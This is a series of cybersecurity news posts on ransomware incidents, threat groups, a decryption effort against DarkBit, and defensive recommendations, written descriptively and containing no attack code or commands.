The report identified the leading ransomware variants for the quarter as Akira, responsible for 19% of incidents, followed by Qilin at 13% and Lone Wolf at 9%. Notably, Silent Ransom and Shiny Hunters entered the top five variants for the first time, reflecting the growing influence of newer threat groups. Among the most concerning trends was the heavy reliance on social engineering by groups such as Scattered Spider, Silent Ransom, and Shiny Hunters, who have shifted from broad, opportunistic attacks to precise impersonation schemes. By targeting help desks, employees, and third-party service providers, these actors have refined their ability to gain initial access and execute more lucrative attacks.  

Exploitation of known vulnerabilities in widely used platforms including Ivanti, Fortinet, VMware, and Microsoft services remains a common entry point, often taking place immediately after public disclosure of security flaws. At the same time, “lone wolf” cybercriminals armed with generic, unbranded ransomware toolkits are increasing in number, allowing less sophisticated actors to successfully infiltrate enterprise systems. Insider risks and third-party vulnerabilities also rose during the quarter, particularly through business process outsourcing firms, contractors, and IT service providers. Researchers warned that these external partners often hold privileged credentials but lack direct oversight, making them an attractive avenue for attackers. 

The professional services sector was hit hardest, accounting for 20% of all incidents, followed closely by healthcare and consumer services at 14% each. Mid-sized companies with between 11 and 1,000 employees represented 64% of victims, a range that attackers consider optimal for balancing ransom potential against weaker defenses. Before executing data theft or encryption, many attackers are spending additional time mapping networks, identifying high-value assets, and cataloging sensitive systems. This reconnaissance phase often blends in with normal administrative activity, using built-in system commands that are difficult to detect without contextual monitoring. Experts note, however, that detection can be improved by monitoring unusual enumeration activity or deploying deception techniques such as honeyfiles, decoy credentials, or fake infrastructure to trigger early alerts. 

Siegel emphasized that organizations must now treat data exfiltration as an immediate and critical risk rather than a secondary concern. Strengthening identity controls, monitoring privileged accounts, and improving employee awareness against social engineering were highlighted as essential steps to counter evolving ransomware tactics. With attackers increasingly blending technical exploits and psychological manipulation, businesses face mounting pressure to adapt their defenses or risk becoming the next high-value target.
Read more »
Ransomwares
customer data compromise Cyber Attacks Data Breaches Data Leak data security RansomHub RansomHub ransomware ransomware attacks Ransomware group Ransomwares

Manpower Data Breach Hits 145,000 After RansomHub Ransomware Attack

 

Manpower, one of the world’s largest staffing and recruitment companies, has confirmed that nearly 145,000 individuals had their personal data compromised following a ransomware attack in late December 2024. The company, which operates as part of ManpowerGroup alongside Experis and Talent Solutions, employs more than 600,000 workers across 2,700 offices worldwide and reported $17.9 billion in revenues last year. 

The breach came to light after the company investigated a systems outage at a Lansing, Michigan, franchise in January 2025. According to a filing with the Office of the Maine Attorney General, attackers gained unauthorized access to Manpower’s network between December 29, 2024, and January 12, 2025. In notification letters sent to affected individuals, Manpower revealed that certain files may have been accessed or stolen during this time. The company stated that the breach potentially exposed personal information, though the full scope of data compromised remains undisclosed. 

On July 28, 2025, the staffing firm formally notified 144,189 individuals that their data may have been involved in the incident. Following the discovery, Manpower announced that it had implemented stronger IT security measures and is cooperating with the FBI to pursue those responsible. To mitigate the impact on victims, the company is also offering complimentary credit monitoring and identity theft protection services through Equifax. 

The ransomware group RansomHub has claimed responsibility for the attack. In January, shortly after Manpower disclosed the incident, the group alleged that it had stolen 500GB of sensitive files from the company’s systems. According to RansomHub, the stolen trove included personal and corporate records such as passports, Social Security numbers, contact details, financial documents, HR analytics, and confidential contracts. The gang initially published details of the breach on its dark web site but later removed Manpower’s listing, raising speculation that a ransom may have been paid to prevent further data leaks. 

RansomHub is a ransomware-as-a-service (RaaS) operation that emerged in early 2024, evolving from earlier groups known as Cyclops and Knight. Since then, it has been linked to numerous high-profile attacks against global organizations, including Halliburton, Kawasaki’s European operations, Christie’s auction house, Frontier Communications, Planned Parenthood, and the Bologna Football Club. The group was also behind the leak of data stolen in the massive Change Healthcare cyberattack, one of the largest breaches in the U.S. healthcare sector, impacting more than 190 million individuals. 

Last year, the FBI reported that RansomHub affiliates had breached over 200 critical infrastructure organizations across the United States, further underlining the group’s reach and persistence. While ManpowerGroup has not confirmed the exact nature of the stolen data or whether negotiations occurred, a company spokesperson clarified that the incident was confined to an independently operated franchise in Lansing. The spokesperson emphasized that the franchise runs on a separate platform, meaning no ManpowerGroup corporate systems were compromised.

The breach highlights the growing risks ransomware attacks pose to global enterprises, particularly those handling large volumes of sensitive employee and client data. It also reflects how threat actors like RansomHub continue to exploit vulnerabilities in third-party and subsidiary operations, targeting organizations indirectly when direct access to corporate systems is more difficult.
Read more »
Ransomwares
Cyber Security Cyberattacks DarkBit Encryption Key Iran Israel MuddyWater ransomware attacks Ransomware group Ransomwares

Profero Cracks DarkBit Ransomware Encryption After Israel-Iran Cyberattack Links

 

Cybersecurity company Profero managed to break the encryption scheme used by the DarkBit ransomware group, allowing victims to restore their systems without having to pay a ransom. This achievement came during a 2023 incident response investigation, when Profero was called in to assist a client whose VMware ESXi servers had been locked by the malware. 

The timing of the breach coincided with escalating tensions between Israel and Iran, following drone strikes on an Iranian Defense Ministry weapons facility, raising suspicions that the ransomware attack had political motivations. The attackers behind the campaign claimed to represent DarkBit, a group that had previously posed as pro-Iranian hacktivists and had targeted Israeli universities. Their ransom messages included strong anti-Israel rhetoric and demanded payments amounting to 80 Bitcoin. 

Israel’s National Cyber Command later attributed the operation to MuddyWater, a well-known Iranian state-backed advanced persistent threat group that has a history of conducting espionage and disruption campaigns. Unlike conventional ransomware operators who typically pursue ransom negotiations, the DarkBit actors appeared less concerned with money and more focused on causing business disruption and reputational harm, signaling motivations that aligned with state-directed influence campaigns. 

When the attack was discovered, no publicly available decryptor existed for DarkBit. To overcome this, Profero researchers analyzed the malware in detail and found flaws in its encryption process. DarkBit used AES-128-CBC keys created at runtime, which were then encrypted with RSA-2048 and appended to each locked file. However, the method used to generate encryption keys lacked randomness. By combining this weakness with encryption timestamps gleaned from file modification data, the researchers were able to shrink the possible keyspace to just a few billion combinations—far more manageable than expected. 

The team further capitalized on the fact that Virtual Machine Disk (VMDK) files, common on ESXi servers, include predictable header bytes. Instead of brute forcing an entire file, they only needed to check the first 16 bytes to validate potential keys. Profero built a custom tool capable of generating key and initialization vector pairs, which they tested against these known file headers in a high-powered computing environment. This method successfully produced valid decryption keys that restored locked data. 

At the same time, Profero noticed that DarkBit’s encryption technique was incomplete, leaving many portions of files untouched. Since VMDK files are sparse and contain large amounts of empty space, the ransomware often encrypted irrelevant sections while leaving valuable data intact. By carefully exploring the underlying file systems, the team was able to retrieve essential files directly, without requiring full decryption. This dual approach allowed them to recover critical business data and minimize the impact of the attack.  

Researchers noted that DarkBit’s strategy was flawed, as a data-wiping tool would have been more effective at achieving its disruptive aims than a poorly implemented ransomware variant. The attackers’ refusal to negotiate further reinforced the idea that the campaign was intended to damage operations rather than collect ransom payments. Profero has chosen not to release its custom decryptor to the public, but confirmed that it is prepared to help any future victims affected by the same malware.  

The case illustrates how weaknesses in ransomware design can be turned into opportunities for defense and recovery. It also highlights how cyberattacks tied to international conflicts often blur the line between criminal extortion and state-backed disruption, with groups like DarkBit using the guise of hacktivism to amplify their impact.
Read more »
Ransomwares
Akira Ransomware Business Security Cyber Attacks Cyber Vulnerabilities Cybersecurity Threats Public Wifi ransomware attacks Ransomwares

SonicWall VPN Zero-Day Vulnerability Suspected Amid Rising Ransomware Attacks

 

Virtual Private Networks (VPNs) have recently been in the spotlight due to the U.K.’s Online Safety Act, which requires age verification for adult content websites. While many consumers know VPNs as tools for bypassing geo-restrictions or securing public Wi-Fi connections, enterprise-grade VPN appliances play a critical role in business security. 

When researchers issue warnings about possible VPN exploitation, the risk cannot be dismissed. SonicWall has addressed growing concerns after reports surfaced of ransomware groups targeting its devices. According to the company, an investigation revealed that the activity is linked to CVE-2024-40766, a previously disclosed vulnerability documented in their advisory SNWLID-2024-0015, rather than an entirely new zero-day flaw. Fewer than 40 confirmed cases were reported, mostly tied to legacy credentials from firewall migrations. 

Updated guidance includes credential changes and upgrading to SonicOS 7.3.0 with enhanced multi-factor authentication (MFA) protections. Despite these reassurances, Arctic Wolf Labs researcher Julian Tuin observed a noticeable increase in ransomware activity against SonicWall firewall devices in late July. 

Several incidents involved VPN access through SonicWall SSL VPNs. While some intrusions could be explained by brute force or credential stuffing, evidence suggests the possibility of a zero-day vulnerability, as some compromised devices had the latest patches and rotated credentials. 

In several cases, even with TOTP MFA enabled, accounts were breached. SonicWall confirmed it is working closely with threat research teams, including Arctic Wolf, Google Mandiant, and Huntress, to determine whether the incidents are tied to known flaws or a new vulnerability. If a zero-day is confirmed, updated firmware and mitigation steps will be released promptly. 

The urgency is amplified by the involvement of the Akira ransomware group, which has compromised over 300 organizations globally. SonicWall also recently warned of CVE-2025-40599, a serious remote code execution vulnerability in SMA 100 appliances. Experts advise organizations to take immediate precautionary steps, especially given the potential for severe operational disruption. 

Recommended mitigations include disabling SSL VPN services where possible, restricting VPN access to trusted IP addresses, enabling all security services such as botnet protection and geo-IP filtering, removing inactive accounts, enforcing strong password policies, and implementing MFA for all remote access. 

However, MFA alone may not be sufficient in the current threat scenario. The combination of suspected zero-day activity, ransomware escalation, and the targeting of critical remote access infrastructure means that proactive defense measures are essential. 

SonicWall and security researchers continue to monitor the situation closely, urging organizations to act quickly to protect their networks before attackers exploit potential vulnerabilities further.
Read more »
Ransomwares
cryptocurrency Cyber Attacks CyberCriminal cybercriminal group data security Ransom Demands ransomware attacks Ransomware Groups Ransomwares

Romanian Arrested in Diskstation Ransomware Operation Targeting Synology NAS Devices

 

A 44-year-old Romanian national has been arrested as part of a coordinated international law enforcement effort to take down the cybercriminal group behind the Diskstation ransomware campaign. This group is known for targeting Synology Network-Attached Storage (NAS) devices, which are widely used by businesses and organizations for centralized file storage, data backups, and hosting. These attacks have primarily affected entities operating in enterprise environments, where NAS systems are critical to daily operations. 

The Diskstation ransomware group has operated under several aliases, including DiskStation Security, Quick Security, 7even Security, Umbrella Security, and LegendaryDisk Security. Since its emergence in 2021, the group has engaged in multiple ransomware campaigns, encrypting data on NAS devices and demanding cryptocurrency payments in exchange for decryption keys. 

Victims have included international organizations involved in civil rights advocacy, film production, and event management. These attacks left many victims unable to continue operations unless they agreed to pay substantial ransoms. Authorities in Italy launched an investigation after numerous companies in the Lombardy region reported ransomware attacks that rendered their data inaccessible. 

The attackers demanded payments in cryptocurrency, prompting investigators to analyze the affected systems and blockchain transactions. This digital trail eventually led police across borders, uncovering connections in both France and Romania. The operation, dubbed “Elicius,” was coordinated by Europol and culminated in a series of raids in Bucharest in June 2024. During these raids, several individuals believed to be involved in the Diskstation campaign were identified. One suspect was caught in the act of committing a cybercrime. 

The 44-year-old man who was arrested is now in custody and faces charges including unauthorized access to computer systems and extortion. While the Diskstation name is often associated with Synology’s NAS products, this specific campaign received little attention from mainstream cybersecurity outlets. 

However, it caused significant disruption to organizations worldwide. The ransomware gang reportedly demanded payments ranging from $10,000 to several hundred thousand dollars, depending on the organization’s size and data sensitivity. Law enforcement agencies continue to investigate the broader network behind the Diskstation operation. 

The case underscores the growing threat of ransomware campaigns targeting critical infrastructure and storage solutions. As attackers evolve their methods and target widely used systems like Synology NAS, cybersecurity vigilance remains crucial for all organizations, regardless of size or industry.
Read more »
Ransomwares
Advanced Social Engineering Cyber Attacks Cyber SecurityTrojan Attacks Cyber Threat Intelligence Industries Interlock Interlock ransomware ransomware attacks Ransomwares

Interlock RAT Evolves in New KongTuke Web-Inject Attacks Targeting U.S. Industries

 

A recently enhanced version of the Interlock remote access Trojan (RAT) is being deployed in an ongoing web-inject campaign linked to the ransomware group behind it. Known for its double-extortion tactics, Interlock has now shifted its technical approach with a more covert RAT variant written in PHP. According to a new report by The DFIR Report, this marks a significant advancement in the group’s capabilities and strategy.  

Interlock first emerged in late 2024, attacking high-profile targets such as Texas Tech University’s Health Sciences Centers. Earlier this year, cybersecurity firm Quorum Cyber detailed two versions of the group’s malware, named NodeSnake, focused on maintaining persistence and exfiltrating data. The newest version introduces additional stealth features, most notably a transition from JavaScript to PHP, allowing the malware to blend more easily with normal web traffic and avoid detection. 

This enhanced RAT is tied to a broader web-inject threat campaign dubbed “KongTuke,” where victims are tricked into running malicious scripts after visiting compromised websites. Visitors encounter what appears to be a legitimate CAPTCHA but are actually prompted to paste dangerous PowerShell commands into their systems. This action initiates the Interlock RAT, giving attackers access to the machine. 

Once activated, the malware gathers extensive data on the infected system. Using PowerShell, it collects system information, running processes, mounted drives, network connections, and checks its own privilege level. This enables attackers to evaluate the environment quickly and plan further intrusion tactics. It then connects back to command-and-control infrastructure, leveraging services like Cloudflare Tunneling for stealthy communication. Remote desktop protocol (RDP) is used for lateral movement and persistent access. 

Researchers say the targeting in this campaign appears opportunistic, not industry-specific. Victims across various sectors in the U.S. have been identified, with the attackers casting a wide net and focusing efforts where systems and data seem valuable or more vulnerable.  

Defensive recommendations from experts include improving phishing awareness, restricting the use of the Windows Run dialog box, enforcing least privilege access, and requiring multifactor authentication. Blocking unnecessary use of RDP is also essential. 

The growing sophistication of the Interlock RAT and its integration into mass web-inject campaigns reflects an evolving cyber threat landscape where stealth, automation, and social engineering play a central role.
Read more »
Ransomwares
corporate cyber attacks Cyber Security Cyber Security Tool Cyberattack Cyberthreart Data protection data security Enterprise security Ingram Micro Password Security ransomware attacks Ransomwares

Why Major Companies Are Still Falling to Basic Cybersecurity Failures

 

In recent weeks, three major companies—Ingram Micro, United Natural Foods Inc. (UNFI), and McDonald’s—faced disruptive cybersecurity incidents. Despite operating in vastly different sectors—technology distribution, food logistics, and fast food retail—all three breaches stemmed from poor security fundamentals, not advanced cyber threats. 

Ingram Micro, a global distributor of IT and cybersecurity products, was hit by a ransomware attack in early July 2025. The company’s order systems and communication channels were temporarily shut down. Though systems were restored within days, the incident highlights a deeper issue: Ingram had access to top-tier security tools, yet failed to use them effectively. This wasn’t a tech failure—it was a lapse in execution and internal discipline. 

Just two weeks earlier, UNFI, the main distributor for Whole Foods, suffered a similar ransomware attack. The disruption caused significant delays in food supply chains, exposing the fragility of critical infrastructure. In industries that rely on real-time operations, cyber incidents are not just IT issues—they’re direct threats to business continuity. 

Meanwhile, McDonald’s experienced a different type of breach. Researchers discovered that its AI-powered hiring tool, McHire, could be accessed using a default admin login and a weak password—“123456.” This exposed sensitive applicant data, potentially impacting millions. The breach wasn’t due to a sophisticated hacker but to oversight and poor configuration. All three cases demonstrate a common truth: major companies are still vulnerable to basic errors. 

Threat actors like SafePay and Pay2Key are capitalizing on these gaps. SafePay infiltrates networks through stolen VPN credentials, while Pay2Key, allegedly backed by Iran, is now offering incentives for targeting U.S. firms. These groups don’t need advanced tools when companies are leaving the door open. Although Ingram Micro responded quickly—resetting credentials, enforcing MFA, and working with external experts—the damage had already been done. 

Preventive action, such as stricter access control, routine security audits, and proper use of existing tools, could have stopped the breach before it started. These incidents aren’t isolated—they’re indicative of a larger issue: a culture that prioritizes speed and convenience over governance and accountability. 

Security frameworks like NIST or CMMC offer roadmaps for better protection, but they must be followed in practice, not just on paper. The lesson is clear: when organizations fail to take care of cybersecurity basics, they put systems, customers, and their own reputations at risk. Prevention starts with leadership, not technology.
Read more »
threat report
Business Security Cyber Security HoneyWell ransomware attacks threat report

Ransomware Attacks Continue to Rise in an Alarming Trend

 

The frequency and intensity of cyberthreats seem to be increasing despite businesses' ongoing efforts to thwart malicious actors. Honeywell, a global technology and manufacturing firm that also provides cybersecurity solutions, reported a 46% rise in ransomware extortion attacks between October 1, 2024, and March 31, 2025, as compared to the previous six-month period. 

Win32.Worm.Ramnit, a Trojan that typically targets the banking sector to steal account details, was found in 37% of files blocked by Honeywell's SMX product. That represented a 3,000% rise from the second quarter of 2024, when Honeywell last reported on it. 

In its investigation report, Honeywell stated that "it can likely be assumed it has been repurposed to extract control system credentials" due to the Trojan's saturation presence in the ecosystems of its industrial clients. "Existing adversaries continue to disrupt operations across critical sectors, even in the absence of new ransomware variants specifically designed for industrial control systems." 

1,929 ransomware incidents were made public throughout the reporting period. Eight verticals accounted for the vast majority (71%) of the cases, with the industries most affected being manufacturing, construction, healthcare, and technology. 

Given that ransomware attacks are normally "more opportunistic, typically creating a normal distribution of attacks across different industries," Honeywell noted that this was a really unusual pattern. The report claims that supply chain disruptions, manual failovers, and forced production outages caused by ransomware have been experienced by manufacturing plants, water treatment facilities, and energy providers. 

In response to the elevated threats, during the reporting period, some organisations "doubled down on best practices that would be considered baseline," according to Honeywell. Such procedures include, for example, immutable data backups and regular vulnerability assessments. According to Honeywell, as of October 2024, victimised organisations had paid out more than $1 billion in ransomware. 

Another new cybersecurity report, from the Information Security Media Group, focused on artificial intelligence, which it described as the "defining force" of cybersecurity-related disruption. 

As businesses use AI to automate threat detection and scale response capabilities, "adversaries are using the same technologies to enhance phishing, generate polymorphic malware, and conduct identity fraud with unprecedented precision," according to the ISMG research. ISMG added that the combination of AI and quantum computing "further signals a critical shift requiring crypto-agility and forward planning.”
Read more »
Subscribe to: Comments (Atom)